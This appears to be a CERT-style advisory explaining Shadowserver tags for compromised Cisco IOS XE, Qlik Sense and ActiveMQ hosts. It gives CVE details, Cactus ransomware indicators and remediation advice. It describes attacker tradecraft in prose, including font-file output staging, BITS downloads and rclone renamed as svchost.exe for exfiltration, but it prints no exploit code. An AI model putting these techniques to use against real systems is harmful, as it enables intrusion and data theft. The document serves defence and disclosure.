CVEs - Compromised Website Report

This report identifies Compromised Website(s), reported to be running software applications,  which are vulnerable to exploitation through Common Vulnerabilities & Exposures (CVEs) that have been publicly disclosed by the respective vendors of the software applications.

Affected Software Applications


No. Application
1. Cisco IOS XE WebUI.
2. Qlik Sense.

Problem

Cisco IOS XE WebUI - (WebUI) - Web User Interface

The Cisco Internetworking Operating System (IOS) is a family of proprietary network operating systems used on several router and network switch models manufactured by Cisco Systems.   The system is a package of routing, switching, internetworking, and telecommunications functions integrated into a multitasking operating system.

The Cisco IOS XE does not use the IOS as the operating system, instead it uses a Linux operating system where IOS runs as a separate process (daemon) on Linux.  All system functions run as separate processes which has a number of advantages, namely multiprocessing, which means that the workload of processes can be shared across multiple CPUs.  When a single process crashes, it no longer takes down the entire OS.

A Web user interface allows a user to interact with content or software running on a remote server or router through a Web browser.  The content or Web page is downloaded from the Web server and the user can interact with this content in a Web browser, which acts as a client.   The Cisco IOS XE Web User Interface (WebUI) is used to configured a router after it has been installed,  to enable traffic to pass through the network, it is also provides network administrators with a single solution for provisioning, monitoring, and optimising devices.

On the 16th Oct 2023, Cisco Systems, Inc. publicly disclosed Common Vulnerability and Exposure (CVE) Report CVE-2023-20198, this is privilege escalation vulnerability in the Web User Interface (WebUI) feature of Cisco's IOS XE software affecting both physical and virtual devices that have the HTTP or HTTPS Server feature enabled.  Exploitation of this vulnerability would allow a threat actor to obtain initial access and create a privileged account, which is then used to create a local user account with normal privileges.  No software patches or updates were released on the date of disclosure due to ongoing investigation into observed exploitation of the Web User Interface (WebUI) feature in Cisco IOS XE Software in the wild.  Cisco System,  Inc have since released a number of fixed software releases.

On the 25th Oct 2023, Cisco Systems, Inc.  publicly disclosed Common Vulnerability and Exposure (CVE) Report CVE-2023-20273, this is a command injection vulnerability in the Web User Interface (WebUI) feature of Cisco's IOS XE software.  An attacker who had obtained access and created a local user account with normal privileges through the exploitation of CVE-2023-20198, could then inject or run arbitrary commands with elevated (root) privileges, in the underlying operating system.

Qlik Sense

Qlik Sense is a data analysis and visualisation software.  It operates with an associative QIX engine which enables the user to link and associate data from varied sources and carries out dynamic searching and selections.  Qlik Sense serves as a data analytics platform for a wide range of users i.e.  from non-technical to technical users.  Qlik Sense utilises data visualization as it has augmented graphics making it possible to show and analyse data graphicaly.

HTTP listens on port 80/TCP.

HTTPS listens on port 443/TCP.

In August 2023, Two (2) security vulnerabilities in Qlik Sense Enterprise for Windows were identified by Adam Crosser and Thomas Hendrickson of the Cybersecurity Company, Praetorian, based in Austin, Texas, USA.  These vulnerabilities involved HTTP Tunneling and Path Traversal, It was also discovered if the two vulnerabilities are combined and successfully exploited, these issues could lead to a compromise of the server running the Qlik Sense software, including unauthenticated remote code execution (RCE).

On the 29th Aug 2023, the Qlik Software Company publicly disclosed CVE-2023-41265 & CVE-2023-41266 that affect Qlik Sense Enterprise for Windows.

On the 20th Sep 2023, The Qlik Software Company publicly disclosed CVE-2023-48365 that affect Qlik Sense Enterprise for Windows.

On the 25th April 2024, Willem Zeeman and Yun Zheng Hu of Fox-IT., part of the information assurance firm, NCC Group, based in Manchester, UK.,  in collaboration with a number of Dutch cyber security firms that had being researching the Cactus Ransomware Group, reported the group modus operandi of exploiting Qlik Sense systems for initial access which they have been actively targeting since November 2023.

Fox-IT together with their colleagues from the various Dutch cyber security firms discovered that the Cactus Ransomware Group use a particular method and technique for initial access to the Qlik Sense systems.  Based upon these discoveries,  Fox-IT., developed a fingerprinting technique to identify Qlik Sense systems that are vulnerable to this method and technique of initial access, and even more critically, which systems are already compromised.

Arctic Wolf Networks, the computer and network security company, based in Eden Prairie, Minnesota, USA., on the 28th Nov 2024 published a list of Indicators of Compromise (IoCs), they had observed, in their incident response (IR) investigation into the new Cactus Ransomware Group campaign which are reported to exploit publicly exposed installations of Qlik Sense.

Constituents are advised to take appropriate action in the event of having a host running the Qlik Sense System, identified in the 'CVEs - Compromised Website Report'.

Cactus Ransomware Group - Indicators of Compromise (IoCs).


No. Reported by Description Article - IOCs
1. Fox-IT. The Cactus Ransomware Group are reported to redirect the output of executed commands to a True Type font file named qle.ttf, likely abbreviated for “qlik exploit”.  In addition to the qle.ttf file, Fox-IT have also observed instances where qle.woff was used.  These font files are not part of a default Qlik Sense server installation.  Fox-IT discovered that files with a font file extension such as .ttf and .woff can be accessed without any authentication, regardless of whether the server is patched.   This may explain why the Cactus ransomware group opted to store command output in font files within the fonts directory, which in turn,  also serves as a useful Indicator Of Compromise (IoCs). Fox-IT - Identifying Cactus ransomware victims
2. Arctic Wolf Labs. The Cactus Ransomware Group are reported to leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control, including Renamed ManageEngine UEMS executables, with a ZIP extension masquerading as Qlik files.  These files were renamed again after being downloaded and invoked for silent installation.  AnyDesk is downloaded directly from anydesk.com.  A Plink (PuTTY Link) binary is downloaded and renamed to putty.exe.  Current evidence revealed that RDP is used for lateral movement,  WizTree disk space analyzer is downloaded, rclone (renamed as svchost.exe) is leveraged for data exfiltration. ArcticWolf Labs - Qlik Sense Exploited in Cactus Ransomware Campaign

Common Vulnerabilities & Exposures (CVEs)


Systems used for reporting and assessing the severity of security vulnerabilities.

No. System Description
1. Common Vulnerabilities and Exposures (CVE). The CVE system is used to identify, define,  catalogue and publicly disclosed known information-security vulnerabilities and exposures.
2. The Common Vulnerability Scoring System (CVSS). CVSS is a free and open industry standard for assessing the severity of computer system security vulnerabilities.  It provides a numerical (0-10) representation of the severity of an information security vulnerability.

CVSSv3.0 Metrics.

No. Base Score Range Severity
1. 0.0 None
2. 0.1 - 3.9 Low
3. 4.0 - 6.9 Medium
4. 7.0 - 8.9 High
5. 9.0 - 10.0 Critical

CVEs - Compromised Website Report.

No. CVE Report Description CVSSv3 Advisory
1. CVE-2023-20198
Privilege Escalation Vulnerability in the WebUI feature of Cisco's IOS XE software. 10.0 Cisco Security Advisory
2. CVE-2023-20273
A Command Injection Vulnerability in the WebUI feature of Cisco's IOS XE software. 7.2 Cisco Security Advisory
3. CVE-2023-41265
A HTTP tunnelling vulnerability in Qlik Sense Enterprise for Windows due to improper validation of HTTP headers. If successfully exploited an attacker could elevate their privileges and execute HTTP requests on the backend server hosting the software. 9.6 Qlik Community - Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-41266, CVE-2023-41265).
4. CVE-2023-41266
A path traversal vulnerability in Qlik Sense Enterprise for Windows stemming from improper user input validation which could allow a remote, unauthenticated attacker to create an anonymous session by sending maliciously crafted HTTP requests. This anonymous session could allow them to send further requests to unauthorized endpoints. 8.2 Qlik Community - Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-41266, CVE-2023-41265)
5. CVE-2023-48365
Unauthenticated remote code execution (RCE) vulnerability in Qlik Sense Enterprise for Windows as a consequence of an incomplete fix for CVE-2023-41265. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. 9.6 Qlik Community - Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-48365).
6. CVE-2023-46604
The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue. . 9.8 Apache ActiveMQ - Update on CVE-2023-46604

Note: Constituents, on clicking the CVE link in the table above, will be directed to the www.mitre.org webpage, which contain relevant information on the particular CVE No.   Constituents, then have the option to click on the www.cve.org link, which will direct them to the www.cve.org webpage, where additional information on the CVE in question, can be accessed, on inserting the CVE No. in the Find field.

Solution


Shadowserver Foundation - Compromised Website Report - Tag Index.

Note: The Shadowserver Foundation has included in the 'Tag' column of their report, a list of terms, which indicate the type of vulnerability associated with the specific host identified in the report.

No. System Description
1. badcandy;device-implant;ssl Attackers exploit vulnerabilities in Cisco IOS XE WebUI to create high-privilege accounts and install a Lua-based backdoor, resulting in the takeover of vulnerable devices.  The BadCandy implant is based on the Lua programming language and consists of 29 lines of code that facilitates arbitrary command execution.  The host targeted is using HTTPS.
2. badcandy;device-implant;http. Attackers exploit vulnerabilities in Cisco IOS XE WebUI to create high-privilege accounts and install a Lua-based backdoor, resulting in the takeover of vulnerable devices.  The BadCandy implant is based on the Lua programming language and consists of 29 lines of code that facilitates arbitrary command execution.  The host targeted is using HTTP.
3. qliksense;cve-2023-48365. This indicates that the Qlik Sense Service is vulnerable to CVE-2023-48365.
4. injected-code;qliksense;ssl;webshell. This indicates that the Qlik Sense Service is vulnerable.
5. godzilla-webshell. This indicates that the Apache ActiveMQ Service is vulnerable to CVE-2023-46604.

Recommendations.

No. Tag Recommendations
1. badcandy;device-implant;ssl Cisco has strongly recommended that their customers disable the HTTP Server feature on all internet-facing systems or restrict its access to trusted source addresses.  Disabling the HTTP Server feature eliminates the attack vector for these vulnerabilities and may be a suitable mitigation until affected devices can be upgraded.  Cisco has released IOS XE software versions 17.9, 17.6, 17.3 and 16.12 to patch CVE-2023-20198 & CVE-2023-20273.
2. badcandy;device-implant;http. Cisco has strongly recommended that their customers disable the HTTP Server feature on all internet-facing systems or restrict its access to trusted source addresses.  Disabling the HTTP Server feature eliminates the attack vector for these vulnerabilities and may be a suitable mitigation until affected devices can be upgraded.  Cisco has released IOS XE software versions 17.9, 17.6, 17.3 and 16.12 to patch CVE-2023-20198 & CVE-2023-20273.
3. qliksense;cve-2023-48365. Constituents are advised to read the article published by Fox-IT on the 25th April 2024 and the article published by Arctic Wolf Labs on the 28th Nov 2024, both articles contain details of the modus operandi of the Cactus Ransomware Group in exploiting Qlik Sense systems together with a list of Indicators of Compromise (IoCs).   (See - Cactus Ransomware Group - Indicators of Compromise (IoCs) - above for links).
4. injected-code;qliksense;ssl;webshell. Constituents are advised to disconnecting their network from the internet, This action will cut off the Cactus Ransomware Group access to the compromised computer preventing them from exfiltrating data.   Disconnect backup devices from the compromised computer and protect all data backups.  Switching the computer off,  may destroy valuable forensic evidence, which may be required to establish how the computer and network security was breached.   Change passwords for all login accounts on the network and cloud services using a computer on a seperate network.   Investigate the incident to establish the facts, Consult with cyber security experts, if necessary.  In the event of a crime, Constituents are advised to reported the incident to An Gardai Siochana.
5. godzilla-webshell. Users of both ActiveMQ Classic and ActiveMQ Artemis brokers are recommended to upgrade as are users of any Java-based OpenWire client (e.g. Maven dependency on activemq-client) are recommended to upgrade to ActiveMQ Classic:  6.0.0, 5.18.3, 5.17.6, 5.16.7, 5.15.16 and to ActiveMQ Artemis:  2.31.2

Additional Information

Cisco Security Advisory - Multiple Vulnerabilities in Cisco IOS XE Software Web UI Feature.
CISCO Talos - Active exploitation of Cisco IOS XE Software Web Management User Interface vulnerabilities.
Rapid7 - CVE-2023-20198: Active Exploitation of Cisco IOS XE Zero-Day Vulnerability.
US CISA - Guidance for Addressing Cisco IOS XE Web UI.
Shadowserver Foundation - Vulnerable or Compromised Qlik Sense Special Report.
Fox IT - Sifting through the Spines: Identifying (potential) Cactus Ransome Victims.
Arctic Wolf Labs - Qlik Sense Exploited in Cactus Ransome Campaign.
Arctic Wolf Labs - CVE-2023-41265, CVE-2023-41266 & CVE-2023-48365: Multiple Vulnerabilities in Qlik Sense Enterprise Actively Exploited.
ZeroQlik: Achieving Unauthenticated Remote Code Execution via HTTP Request Tunneling and Path Traversal.
Cybersecuritydive - Schneider Electric hit by ransomware attack against its sustainability business division.
SOCRader - Dark Web Profile: Cactus Ransomware.
Bitdefender - CACUS: Analyzing a Coordinated Ransomware Attack on Corporate Networks.
Qlik Help.
Qlik Sense Architecture – 4 Major Components of Architecture.
101. What is QIX and Why Should You Care?.
Qlik Sense Tutorial For Beginners – Features and Architecture.
PrickSense: How Cactus Exploits Qlik Sense.
RFC2616 - Hypertext Transfer Protocol -- HTTP/1.1.
Cyberveilig Nederland - Press release: Melissa partnership finds several Dutch victims of ransomware group Cactus.
Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-41266, CVE-2023-41265).
Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-48365).
Shadowserver Foundation - Accessible ActiveMQ Service Report.
Apache ActiveMQ Vulnerability Leads to Stealthy Godzilla Webshell.